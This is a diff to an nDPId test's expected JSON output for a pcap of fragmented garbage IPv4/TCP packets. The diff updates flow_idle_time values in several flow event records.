+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1534244025001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkkqT1B7IjpoZGZsa2RhPkwp4QAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001} 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":315,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjxNTkJIR0ZERVcjQCQlXkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":316,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025001} @@ -1252,8 +1252,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":625,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSg="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025005} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":626,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025001,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiomXiUkI0Aj"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244025305,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":627,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiQlXiYqKComXiUkI3JzZGy7owAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305} 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":628,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnVoZ2tmZHNia252Yy8udGc="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":629,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025305} @@ -1878,8 +1878,8 @@ 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":938,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAj9HUj9HUj9zUj83NDgzOTY="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025309} 00340{"packet_event_id":1,"packet_event_name":"packet","packet_id":939,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025305,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAikoKiZeJSQj"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025609,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244025609,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16417,"dst_port":16419,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1534244025609,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkAhQCMkJV4mKigpKComXiUNOgAA"} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609} 00352{"packet_event_id":1,"packet_event_name":"packet","packet_id":941,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCMkJV4mKigqJl4lJCM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":942,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025609} @@ -2504,8 +2504,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1251,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAktJSkhHRkQyKiZERkdISks="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025612} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1252,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025609,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjI0VU"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244025912,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAlIlWV5VJkkqT1B7IjpoZGY4UAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1254,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAmxrZGE+TDxNTkJIR0ZERVc="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1255,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244025912} @@ -3130,8 +3130,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1564,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiVeSEJHVgo0MjE0NjMxOTg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244025916} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1565,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244025912,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjIwNTEpKCom"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244026217,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAl4lJCNAIyQlXiYqKComXiX0OgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1567,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjcnNkbHVoZ2tmZHNia24="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1568,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026217} @@ -3756,8 +3756,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1877,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj8="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026221} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":1878,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026217,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjc0ODM5Niko"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026521,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026521,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10790,"dst_port":24101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1879,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1534244026521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiomXiUkI0AhQCMkJV4mKigSPwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":1880,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCMkJV4mKig="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":1881,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026521} @@ -4382,8 +4382,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2190,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiUkIyYqKEtJSkhHRkQyKiY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026525} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2191,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026521,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkRGR0hKSyZe"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026825,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244026825,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9508,"dst_port":8995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2192,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1534244026825,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiUkIyNFVFIlWV5VJkkqT1DEpQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825} 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2193,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAnsiOmhkZmxrZGE+TDxNTkI="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2194,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244026825} @@ -5008,8 +5008,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":2503,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAkRFVyNAJCVeSEJHVgo0MjE="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244026828} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":2504,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244026825,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAjQ2MzE5ODIw"} 